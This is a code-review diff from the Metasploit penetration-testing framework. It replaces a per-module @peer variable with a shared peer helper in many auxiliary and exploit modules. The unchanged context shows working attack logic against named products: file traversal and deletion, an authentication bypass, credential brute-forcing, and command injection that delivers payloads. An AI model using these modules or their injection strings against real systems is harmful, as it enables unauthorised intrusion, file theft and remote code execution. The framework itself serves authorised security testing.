### PR TITLE
Remove @peer for modules that use HttpClient

### DIFF
--- a/modules/auxiliary/admin/http/axigen_file_access.rb
+++ b/modules/auxiliary/admin/http/axigen_file_access.rb
@@ -51,13 +51,11 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Trying to login")
+    print_status("#{peer} - Trying to login")
     if login
-      print_good("#{@peer} - Login successful")
+      print_good("#{peer} - Login successful")
     else
-      print_error("#{@peer} - Login failed, review USERNAME and PASSWORD options")
+      print_error("#{peer} - Login failed, review USERNAME and PASSWORD options")
       return
     end
 
@@ -69,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
       @traversal.gsub!(/\//, "\\")
       file.gsub!(/\//, "\\")
     else # unix
-      print_error("#{@peer} - *nix platform detected, vulnerability is only known to work on Windows")
+      print_error("#{peer} - *nix platform detected, vulnerability is only known to work on Windows")
       return
     end
 
@@ -83,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def read_file(file)
 
-    print_status("#{@peer} - Retrieving file contents...")
+    print_status("#{peer} - Retrieving file contents...")
 
     res = send_request_cgi(
     {
@@ -98,14 +96,14 @@ class Metasploit3 < Msf::Auxiliary
 
     if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0
       store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file)
-      print_good("#{@peer} - File successfully retrieved and saved on #{store_path}")
+      print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
     else
-      print_error("#{@peer} - Failed to retrieve file")
+      print_error("#{peer} - Failed to retrieve file")
     end
   end
 
   def delete_file(file)
-    print_status("#{@peer} - Deleting file #{file}")
+    print_status("#{peer} - Deleting file #{file}")
 
     res = send_request_cgi(
     {
@@ -121,14 +119,14 @@ class Metasploit3 < Msf::Auxiliary
     })
 
     if res and res.code == 200 and res.body =~ /View Log Files/
-      print_good("#{@peer} - File #{file} deleted")
+      print_good("#{peer} - File #{file} deleted")
     else
-      print_error("#{@peer} - Error deleting file #{file}")
+      print_error("#{peer} - Error deleting file #{file}")
     end
   end
 
   def get_platform
-    print_status("#{@peer} - Retrieving platform")
+    print_status("#{peer} - Retrieving platform")
 
     res = send_request_cgi(
       {
@@ -142,15 +140,15 @@ class Metasploit3 < Msf::Auxiliary
 
     if res and res.code == 200
       if res.body =~ /Windows/
-        print_good("#{@peer} - Windows platform found")
+        print_good("#{peer} - Windows platform found")
         return 'windows'
       elsif res.body =~ /Linux/
-        print_good("#{@peer} - Linux platform found")
+        print_good("#{peer} - Linux platform found")
         return 'unix'
       end
     end
 
-    print_warning("#{@peer} - Platform not found, assuming UNIX flavor")
+    print_warning("#{peer} - Platform not found, assuming UNIX flavor")
     return 'unix'
   end
 

--- a/modules/auxiliary/admin/http/iis_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb
@@ -76,19 +76,17 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    @peer = "#{rhost}:#{rport}"
-
     if not has_auth
-      print_error("#{@peer} - No basic authentication enabled")
+      print_error("#{peer} - No basic authentication enabled")
       return
     end
 
     bypass_string = try_auth
 
     if bypass_string.empty?
-      print_error("#{@peer} - The bypass attempt did not work")
+      print_error("#{peer} - The bypass attempt did not work")
     else
-      print_good("#{@peer} - You can bypass auth by doing: #{bypass_string}")
+      print_good("#{peer} - You can bypass auth by doing: #{bypass_string}")
     end
   end
 

--- a/modules/auxiliary/admin/http/intersil_pass_reset.rb
+++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb
@@ -52,23 +52,22 @@ class Metasploit3 < Msf::Auxiliary
       })
 
       if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
-        print_status("#{@peer} - Boa Version Detected: #{m[1]}")
+        print_status("#{peer} - Boa Version Detected: #{m[1]}")
         return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
         return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
         return Exploit::CheckCode::Vulnerable
       else
-        print_status("#{@peer} - Not a Boa Server!")
+        print_status("#{peer} - Not a Boa Server!")
         return Exploit::CheckCode::Safe # not a boa server
       end
 
     rescue Rex::ConnectionRefused
-      print_error("#{@peer} - Connection refused by server.")
+      print_error("#{peer} - Connection refused by server.")
       return Exploit::CheckCode::Safe
     end
   end
 
   def run
-    @peer = "#{rhost}:#{rport}"
     return if check != Exploit::CheckCode::Vulnerable
 
     uri = normalize_uri(target_uri.path)
@@ -81,14 +80,14 @@ class Metasploit3 < Msf::Auxiliary
     })
 
     if res.nil?
-      print_error("#{@peer} - The server may be down")
+      print_error("#{peer} - The server may be down")
       return
     elsif res and res.code != 401
-      print_status("#{@peer} - #{uri} does not have basic authentication enabled")
+      print_status("#{peer} - #{uri} does not have basic authentication enabled")
       return
     end
 
-    print_status("#{@peer} - Server still operational. Checking to see if password has been overwritten")
+    print_status("#{peer} - Server still operational. Checking to see if password has been overwritten")
     res = send_request_cgi({
       'uri'   => uri,
       'method'=> 'GET',
@@ -96,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary
     })
 
     if not res
-      print_error("#{@peer} - Server timedout, will not continue")
+      print_error("#{peer} - Server timedout, will not continue")
       return
     end
 
     case res.code
     when 200
-      print_good("#{@peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
+      print_good("#{peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
     when 401
-      print_error("#{@peer} - Access forbidden. The password reset attempt did not work")
+      print_error("#{peer} - Access forbidden. The password reset attempt did not work")
     else
-      print_status("#{@peer} - Unexpected response: Code #{res.code} encountered")
+      print_status("#{peer} - Unexpected response: Code #{res.code} encountered")
     end
 
   end

--- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
+++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
@@ -51,13 +51,11 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Trying to login")
+    print_status("#{peer} - Trying to login")
     if login
-      print_good("#{@peer} - Login successful")
+      print_good("#{peer} - Login successful")
     else
-      print_error("#{@peer} - Login failed, review USERNAME and PASSWORD options")
+      print_error("#{peer} - Login failed, review USERNAME and PASSWORD options")
       return
     end
 
@@ -71,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def read_file(file)
 
-    print_status("#{@peer} - Copying file to Web location...")
+    print_status("#{peer} - Copying file to Web location...")
 
     dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/"
     res = send_request_cgi(
@@ -88,12 +86,12 @@ class Metasploit3 < Msf::Auxiliary
     })
 
     if res and res.code == 200 and res.body =~ /\{"success":true\}/
-      print_good("#{@peer} - File #{file} copied to #{dst_path} successfully")
+      print_good("#{peer} - File #{file} copied to #{dst_path} successfully")
     else
-      print_error("#{@peer} - Failed to copy #{file} to #{dst_path}")
+      print_error("#{peer} - Failed to copy #{file} to #{dst_path}")
     end
 
-    print_status("#{@peer} - Retrieving file contents...")
+    print_status("#{peer} - Retrieving file contents...")
 
     res = send_request_cgi(
       {
@@ -103,9 +101,9 @@ class Metasploit3 < Msf::Auxiliary
 
     if res and res.code == 200
       store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file)
-      print_good("#{@peer} - File successfully retrieved and saved on #{store_path}")
+      print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
     else
-      print_error("#{@peer} - Failed to retrieve file")
+      print_error("#{peer} - Failed to retrieve file")
     end
 
     # Cleanup
@@ -113,7 +111,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def delete_file(file)
-    print_status("#{@peer} - Deleting file #{file}")
+    print_status("#{peer} - Deleting file #{file}")
 
     res = send_request_cgi(
     {
@@ -127,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary
     })
 
     if res and res.code == 200 and res.body =~ /\{"success":true\}/
-      print_good("#{@peer} - File #{file} deleted")
+      print_good("#{peer} - File #{file} deleted")
     else
-      print_error("#{@peer} - Error deleting file #{file}")
+      print_error("#{peer} - Error deleting file #{file}")
     end
   end
 

--- a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb
+++ b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
     travs << file
     travs << "%00"
 
-    print_status("#{@peer} - Retrieving file contents...")
+    print_status("#{peer} - Retrieving file contents...")
 
     res = send_request_cgi(
       {
@@ -95,19 +95,17 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...")
+    print_status("#{peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...")
     if is_proficy?
-      print_good("#{@peer} - Check successful")
+      print_good("#{peer} - Check successful")
     else
-      print_error("#{@peer} - Sophos Web Protect Appliance vulnerable component not found")
+      print_error("#{peer} - Sophos Web Protect Appliance vulnerable component not found")
       return
     end
 
     contents = read_file(datastore['FILEPATH'])
     if contents.nil?
-      print_error("#{@peer} - File not downloaded")
+      print_error("#{peer} - File not downloaded")
       return
     end
 
@@ -119,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary
         contents,
         file_name
     )
-    print_good("#{rhost}:#{rport} - File saved in: #{path}")
+    print_good("#{peer} - File saved in: #{path}")
 
   end
 

--- a/modules/auxiliary/scanner/http/dolibarr_login.rb
+++ b/modules/auxiliary/scanner/http/dolibarr_login.rb
@@ -62,11 +62,11 @@ class Metasploit3 < Msf::Auxiliary
     #
     sid, token = get_sid_token
     if sid.nil? or token.nil?
-      print_error("#{@peer} - Unable to obtain session ID or token, cannot continue")
+      print_error("#{peer} - Unable to obtain session ID or token, cannot continue")
       return :abort
     else
-      vprint_status("#{@peer} - Using sessiond ID: #{sid}")
-      vprint_status("#{@peer} - Using token: #{token}")
+      vprint_status("#{peer} - Using sessiond ID: #{sid}")
+      vprint_status("#{peer} - Using token: #{token}")
     end
 
     begin
@@ -86,18 +86,18 @@ class Metasploit3 < Msf::Auxiliary
         }
       })
     rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
-      vprint_error("#{@peer} - Service failed to respond")
+      vprint_error("#{peer} - Service failed to respond")
       return :abort
     end
 
     if res.nil?
-      print_error("#{@peer} - Connection timed out")
+      print_error("#{peer} - Connection timed out")
       return :abort
     end
 
     location = res.headers['Location']
     if res and res.headers and (location = res.headers['Location']) and location =~ /admin\//
-      print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"")
+      print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
       report_auth_info({
         :host        => rhost,
         :port        => rport,
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary
       })
       return :next_user
     else
-      vprint_error("#{@peer} - Bad login: \"#{user}:#{pass}\"")
+      vprint_error("#{peer} - Bad login: \"#{user}:#{pass}\"")
       return
     end
   end
@@ -117,10 +117,9 @@ class Metasploit3 < Msf::Auxiliary
   def run
     @uri = target_uri.path
     @uri.path << "/" if @uri.path[-1, 1] != "/"
-    @peer = "#{rhost}:#{rport}"
 
     each_user_pass { |user, pass|
-      vprint_status("#{@peer} - Trying \"#{user}:#{pass}\"")
+      vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
       do_login(user, pass)
     }
   end

--- a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb
@@ -47,18 +47,17 @@ class Metasploit4 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    @peer = "#{rhost}:#{rport}"
     @uri = normalize_uri(target_uri.path)
     @uri << '/' if @uri[-1,1] != '/'
 
-    print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
+    print_status("#{peer} - Connecting to SiteScope SOAP Interface")
 
     res = send_request_cgi({
       'uri'     => "#{@uri}services/APISiteScopeImpl",
       'method'  => 'GET'})
 
     if not res
-      print_error("#{@peer} - Unable to connect")
+      print_error("#{peer} - Unable to connect")
       return
     end
 
@@ -66,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary
   end
 
   def accessfile
-    print_status("#{@peer} - Retrieving the target hostname")
+    print_status("#{peer} - Retrieving the target hostname")
 
     data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
     data << "<wsns0:Envelope" + "\r\n"
@@ -108,11 +107,11 @@ class Metasploit4 < Msf::Auxiliary
     end
 
     if not host_name or host_name.empty?
-      print_error("#{@peer} - Failed to retrieve the host name")
+      print_error("#{peer} - Failed to retrieve the host name")
       return
     end
 
-    print_status("#{@peer} - Retrieving the file contents")
+    print_status("#{peer} - Retrieving the file contents")
 
     data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
     data << "<wsns0:Envelope" + "\r\n"
@@ -153,7 +152,7 @@ class Metasploit4 < Msf::Auxiliary
         boundary = $1
       end
       if not boundary or boundary.empty?
-        print_error("#{@peer} - Failed to retrieve the file contents")
+        print_error("#{peer} - Failed to retrieve the file contents")
         return
       end
 
@@ -161,7 +160,7 @@ class Metasploit4 < Msf::Auxiliary
         cid = $1
       end
       if not cid or cid.empty?
-        print_error("#{@peer} - Failed to retrieve the file contents")
+        print_error("#{peer} - Failed to retrieve the file contents")
         return
       end
 
@@ -169,17 +168,17 @@ class Metasploit4 < Msf::Auxiliary
         loot = Rex::Text.ungzip($1)
       end
       if not loot or loot.empty?
-        print_error("#{@peer} - Failed to retrieve the file contents")
+        print_error("#{peer} - Failed to retrieve the file contents")
         return
       end
 
       f = ::File.basename(datastore['RFILE'])
       path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
-      print_status("#{@peer} - #{datastore['RFILE']} saved in #{path}")
+      print_status("#{peer} - #{datastore['RFILE']} saved in #{path}")
       return
     end
 
-    print_error("#{@peer} - Failed to retrieve the file contents")
+    print_error("#{peer} - Failed to retrieve the file contents")
   end
 
 end

--- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
+++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
@@ -48,11 +48,10 @@ class Metasploit4 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    @peer = "#{rhost}:#{rport}"
     @uri = normalize_uri(target_uri.path)
     @uri << '/' if @uri[-1,1] != '/'
 
-    print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
+    print_status("#{peer} - Connecting to SiteScope SOAP Interface")
 
     uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
 
@@ -61,7 +60,7 @@ class Metasploit4 < Msf::Auxiliary
       'method'  => 'GET'})
 
     if not res
-      print_error("#{@peer} - Unable to connect")
+      print_error("#{peer} - Unable to connect")
       return
     end
 
@@ -85,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary
     data << "</wsns0:Body>" + "\r\n"
     data << "</wsns0:Envelope>"
 
-    print_status("#{@peer} - Retrieving the SiteScope Configuration")
+    print_status("#{peer} - Retrieving the SiteScope Configuration")
 
     uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
 
@@ -104,7 +103,7 @@ class Metasploit4 < Msf::Auxiliary
         boundary = $1
       end
       if not boundary or boundary.empty?
-        print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
+        print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
         return
       end
 
@@ -112,7 +111,7 @@ class Metasploit4 < Msf::Auxiliary
         cid = $1
       end
       if not cid or cid.empty?
-        print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
+        print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
         return
       end
 
@@ -120,17 +119,17 @@ class Metasploit4 < Msf::Auxiliary
         loot = Rex::Text.ungzip($1)
       end
       if not loot or loot.empty?
-        print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
+        print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
         return
       end
 
       path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration")
-      print_status("#{@peer} - HP SiteScope Configuration saved in #{path}")
-      print_status("#{@peer} - HP SiteScope Configuration is saved as Java serialization data")
+      print_status("#{peer} - HP SiteScope Configuration saved in #{path}")
+      print_status("#{peer} - HP SiteScope Configuration is saved as Java serialization data")
       return
     end
 
-    print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
+    print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
   end
 
 end

--- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb
@@ -47,11 +47,10 @@ class Metasploit4 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    @peer = "#{rhost}:#{rport}"
     @uri = normalize_uri(target_uri.path)
     @uri << '/' if @uri[-1,1] != '/'
 
-    print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
+    print_status("#{peer} - Connecting to SiteScope SOAP Interface")
 
     uri = normalize_uri(@uri, 'services/APIMonitorImpl')
 
@@ -60,7 +59,7 @@ class Metasploit4 < Msf::Auxiliary
       'method'  => 'GET'})
 
     if not res
-      print_error("#{@peer} - Unable to connect")
+      print_error("#{peer} - Unable to connect")
       return
     end
 
@@ -89,7 +88,7 @@ class Metasploit4 < Msf::Auxiliary
     data << "</wsns0:Body>" + "\r\n"
     data << "</wsns0:Envelope>" + "\r\n"
 
-    print_status("#{@peer} - Retrieving the file contents")
+    print_status("#{peer} - Retrieving the file contents")
 
     uri = normalize_uri(@uri, 'services/APIMonitorImpl')
 
@@ -105,16 +104,16 @@ class Metasploit4 < Msf::Auxiliary
     if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m
       loot = CGI.unescapeHTML($1)
       if not loot or loot.empty?
-        print_status("#{@peer} - Retrieved empty file")
+        print_status("#{peer} - Retrieved empty file")
         return
       end
       f = ::File.basename(datastore['RFILE'])
       path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
-      print_status("#{@peer} - #{datastore['RFILE']} saved in #{path}")
+      print_status("#{peer} - #{datastore['RFILE']} saved in #{path}")
       return
     end
 
-    print_error("#{@peer} - Failed to retrieve the file")
+    print_error("#{peer} - Failed to retrieve the file")
   end
 
 end

--- a/modules/auxiliary/scanner/http/vcms_login.rb
+++ b/modules/auxiliary/scanner/http/vcms_login.rb
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
         'cookie' => sid
       })
     rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
-      vprint_error("#{@peer} - Service failed to respond")
+      vprint_error("#{peer} - Service failed to respond")
       return :abort
     end
 
@@ -86,9 +86,9 @@ class Metasploit3 < Msf::Auxiliary
       when /User name already confirmed/
         return :skip_user
       when /Invalid password/
-        vprint_status("#{@peer} - Username found: #{user}")
+        vprint_status("#{peer} - Username found: #{user}")
       else /\<a href="process\.php\?logout=1"\>/
-        print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"")
+        print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
         report_auth_info({
           :host        => rhost,
           :port        => rport,
@@ -108,10 +108,9 @@ class Metasploit3 < Msf::Auxiliary
   def run
     @uri = normalize_uri(target_uri.path)
     @uri.path << "/" if @uri.path[-1, 1] != "/"
-    @peer = "#{rhost}:#{rport}"
 
     each_user_pass { |user, pass|
-      vprint_status("#{@peer} - Trying \"#{user}:#{pass}\"")
+      vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
       do_login(user, pass)
     }
   end

--- a/modules/exploits/linux/http/astium_sqli_upload.rb
+++ b/modules/exploits/linux/http/astium_sqli_upload.rb
@@ -48,10 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote
         ], self.class)
   end
 
-  def peer
-    return "#{rhost}:#{rport}"
-  end
-
   def uri
     return target_uri.path
   end

--- a/modules/exploits/linux/http/mutiny_frontend_upload.rb
+++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb
@@ -140,40 +140,38 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Trying to login")
+    print_status("#{peer} - Trying to login")
     if login
-      print_good("#{@peer} - Login successful")
+      print_good("#{peer} - Login successful")
     else
-      fail_with(Failure::NoAccess, "#{@peer} - Login failed, review USERNAME and PASSWORD options")
+      fail_with(Failure::NoAccess, "#{peer} - Login failed, review USERNAME and PASSWORD options")
     end
 
     exploit_native
   end
 
   def exploit_native
-    print_status("#{@peer} - Uploading executable Payload file")
+    print_status("#{peer} - Uploading executable Payload file")
     elf = payload.encoded_exe
     elf_location = "/tmp"
     elf_filename = "#{rand_text_alpha_lower(8)}.elf"
     if upload_file(elf_location, elf_filename, elf)
       register_files_for_cleanup("#{elf_location}/#{elf_filename}")
     else
-      fail_with(Failure::Unknown, "#{@peer} - Payload upload failed")
+      fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
     end
 
-    print_status("#{@peer} - Uploading JSP to execute the payload")
+    print_status("#{peer} - Uploading JSP to execute the payload")
     jsp = jsp_execute_command("#{elf_location}/#{elf_filename}")
     jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m"
     jsp_filename = "#{rand_text_alpha_lower(8)}.jsp"
     if upload_file(jsp_location, jsp_filename, jsp)
       register_files_for_cleanup("#{jsp_location}/#{jsp_filename}")
     else
-      fail_with(Failure::Unknown, "#{@peer} - JSP upload failed")
+      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
     end
 
-    print_status("#{@peer} - Executing payload")
+    print_status("#{peer} - Executing payload")
     send_request_cgi(
     {
       'uri'    => normalize_uri(target_uri.path, "m", jsp_filename),

--- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb
+++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb
@@ -69,11 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-
-    @peer = "#{rhost}:#{rport}"
-
     # retrieve software version from login page
-    print_status("#{@peer} - Sending check")
+    print_status("#{peer} - Sending check")
     begin
       res = send_request_cgi({
         'uri' => '/'
@@ -86,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
       end
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
     end
     return Exploit::CheckCode::Unknown
 
@@ -98,14 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
-
-    @peer = "#{rhost}:#{rport}"
     user  = datastore['USERNAME']
     pass  = datastore['PASSWORD']
     cmd   = Rex::Text.uri_encode("&#{payload.raw}&")
 
     # send payload
-    print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
+    print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
     begin
       res = send_request_cgi({
         'uri'    => "/admin/system.html?step=2&device=lo#{cmd}",
@@ -116,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     if    res and res.code == 200 and res.body =~ /<title>System : Network Setup<\/title>/
-      print_good("#{@peer} - Payload sent successfully")
+      print_good("#{peer} - Payload sent successfully")
     elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/
       fail_with(Failure::NoAccess, 'Authentication failed')
     else

--- a/modules/exploits/linux/http/wanem_exec.rb
+++ b/modules/exploits/linux/http/wanem_exec.rb
@@ -65,12 +65,11 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    @peer = "#{rhost}:#{rport}"
     fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
     data  = "pc=127.0.0.1; "
     data << Rex::Text.uri_encode("echo #{fingerprint}")
     data << "%26"
-    print_status("#{@peer} - Sending check")
+    print_status("#{peer} - Sending check")
 
     begin
       res = send_request_cgi({
@@ -79,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'data'   => data
       }, 25)
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
       return Exploit::CheckCode::Unknown
     end
 
@@ -91,11 +90,10 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
     data  = "pc=127.0.0.1; "
     data << Rex::Text.uri_encode(payload.raw)
     data << "%26"
-    print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
+    print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
     begin
       res = send_request_cgi({
         'uri'    => '/WANem/result.php',
@@ -103,12 +101,12 @@ class Metasploit3 < Msf::Exploit::Remote
         'data'   => data
       }, 25)
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
     end
     if res and res.code == 200
-      print_good("#{@peer} - Payload sent successfully")
+      print_good("#{peer} - Payload sent successfully")
     else
-      print_error("#{@peer} - Sending payload failed")
+      print_error("#{peer} - Sending payload failed")
     end
   end
 

--- a/modules/exploits/linux/http/zen_load_balancer_exec.rb
+++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb
@@ -65,11 +65,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-
-    @peer = "#{rhost}:#{rport}"
-
     # retrieve software version from config file
-    print_status("#{@peer} - Sending check")
+    print_status("#{peer} - Sending check")
     begin
       res = send_request_cgi({
         'uri' => '/config/global.conf'
@@ -82,15 +79,13 @@ class Metasploit3 < Msf::Exploit::Remote
       end
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
     end
     return Exploit::CheckCode::Unknown
 
   end
 
   def exploit
-
-    @peer = "#{rhost}:#{rport}"
     user  = datastore['USERNAME']
     pass  = datastore['PASSWORD']
     auth  = Rex::Text.encode_base64("#{user}:#{pass}")
@@ -98,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
     lines = rand(100) + 1
 
     # send payload
-    print_status("#{@peer} - Sending payload (#{payload.encoded.length} bytes)")
+    print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)")
     begin
       res = send_request_cgi({
         'uri'     => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}",

--- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
+++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
@@ -63,9 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-
-    @peer = "#{rhost}:#{rport}"
-
     # retrieve software version from login page
     begin
       res = send_request_raw({
@@ -76,22 +73,20 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Detected   if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
       return Exploit::CheckCode::Safe
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
     end
     return Exploit::CheckCode::Unknown
 
   end
 
   def exploit
-
-    @peer    = "#{rhost}:#{rport}"
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
     command  = URI.encode(payload.encoded)+"%26"
     postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}"
 
     # send payload
-    print_status("#{@peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)")
+    print_status("#{peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)")
     begin
       res = send_request_cgi({
         'method'    => 'POST',
@@ -99,14 +94,14 @@ class Metasploit3 < Msf::Exploit::Remote
         'data'      => "#{postdata}",
       })
       if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/
-        print_error("#{@peer} - Authentication failed. Incorrect username/password.")
+        print_error("#{peer} - Authentication failed. Incorrect username/password.")
         return
       end
-      print_status("#{@peer} - Sent payload successfully")
+      print_status("#{peer} - Sent payload successfully")
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
     rescue
-      print_error("#{@peer} - Sending payload failed")
+      print_error("#{peer} - Sending payload failed")
     end
 
     handler

--- a/modules/exploits/multi/http/auxilium_upload_exec.rb
+++ b/modules/exploits/multi/http/auxilium_upload_exec.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
     post_data = data.to_s
     post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
-    print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
+    print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
     res = send_request_cgi({
       'method' => 'POST',
       'uri'    => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
@@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res
-      print_error("#{@peer} - No response from host")
+      print_error("#{peer} - No response from host")
       return
     end
 
-    print_status("#{@peer} - Requesting '#{php_fname}'...")
+    print_status("#{peer} - Requesting '#{php_fname}'...")
     res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")})
     if res and res.code == 404
-      print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
+      print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}")
